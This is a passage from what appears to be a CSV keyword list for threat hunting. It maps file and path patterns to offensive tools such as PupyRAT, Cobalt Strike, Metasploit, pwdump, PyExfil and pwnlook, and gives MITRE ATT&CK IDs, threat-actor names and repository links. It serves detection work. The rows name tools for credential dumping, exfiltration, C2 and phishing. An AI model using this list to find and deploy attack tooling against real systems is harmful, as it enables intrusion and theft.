"*/pupyx86d.exe*",".{0,1000}\/pupyx86d\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - 
Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10030" "*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10031" "*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10032" "*/putter.profile*",".{0,1000}\/putter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","10033" "*/PView.psm1*",".{0,1000}\/PView\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","10034" 
"*/PWA-Phishing.git*",".{0,1000}\/PWA\-Phishing\.git.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","10035" "*/pwcrack banner*",".{0,1000}\/pwcrack\sbanner.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#linux","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10036" "*/pwcrack.sh*",".{0,1000}\/pwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","10037" "*/pwcrack-framework.git*",".{0,1000}\/pwcrack\-framework\.git.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10038" "*/pwcrack-framework/*",".{0,1000}\/pwcrack\-framework\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","10039" "*/pwdump.py*",".{0,1000}\/pwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - 
TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","10040" "*/pwdump.py*",".{0,1000}\/pwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10041" "*/pwdump7.zip*",".{0,1000}\/pwdump7\.zip.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesystem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10042" "*/pwdump8.*",".{0,1000}\/pwdump8\..{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesystem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. 
Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10043" "*/pwn_php.me*",".{0,1000}\/pwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","10044" "*/pwn_python.me*",".{0,1000}\/pwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","10045" "*/PwnDB.py*",".{0,1000}\/PwnDB\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","10047" "*/pwndrop.git*",".{0,1000}\/pwndrop\.git.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","10048" "*/pwndrop.ini*",".{0,1000}\/pwndrop\.ini.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","10049" "*/Pwned.as*",".{0,1000}\/Pwned\.as.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10050" "*/PwnKit-Exploit*",".{0,1000}\/PwnKit\-Exploit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","10051" "*/pwnlook.exe*",".{0,1000}\/pwnlook\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10052" "*/pwnlook.git*",".{0,1000}\/pwnlook\.git.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10053" 
"*/pwnlook/releases/download/*",".{0,1000}\/pwnlook\/releases\/download\/.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10054" "*/pwnlook35.exe*",".{0,1000}\/pwnlook35\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10055" "*/pwnlook481.exe*",".{0,1000}\/pwnlook481\.exe.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","10056" "*/pxesploit/*",".{0,1000}\/pxesploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10057" "*/PXEThief*",".{0,1000}\/PXEThief.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","10058" "*/pxexploit*",".{0,1000}\/pxexploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10059" "*/py_oneliner.py*",".{0,1000}\/py_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10060" "*/pyasn1/*",".{0,1000}\/pyasn1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","10062" "*/PyClone.py*",".{0,1000}\/PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","10063" "*/pycobalt-*",".{0,1000}\/pycobalt\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","10064" "*/pycobalt/*",".{0,1000}\/pycobalt\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","10065" "*/PyExec.git*",".{0,1000}\/PyExec\.git.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","10066" "*/PyExfil.git*",".{0,1000}\/PyExfil\.git.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","10067" "*/PyExfil/pyexfil/*",".{0,1000}\/PyExfil\/pyexfil\/.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","10068" "*/pykiller/CVE-2022-23131*",".{0,1000}\/pykiller\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","N/A","1","2","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z","10071" "*/pyLAPS.git*",".{0,1000}\/pyLAPS\.git.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","10072" "*/pyLAPS.py*",".{0,1000}\/pyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - 
T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","10073" "*/pymetasploit/*",".{0,1000}\/pymetasploit\/.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#linux","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","10074" "*/Pyobfadvance*",".{0,1000}\/Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10075" "*/Pyobfexecute*",".{0,1000}\/Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10076" "*/pyobfgood*",".{0,1000}\/pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","10077" "*/Pyobflite*",".{0,1000}\/Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - 
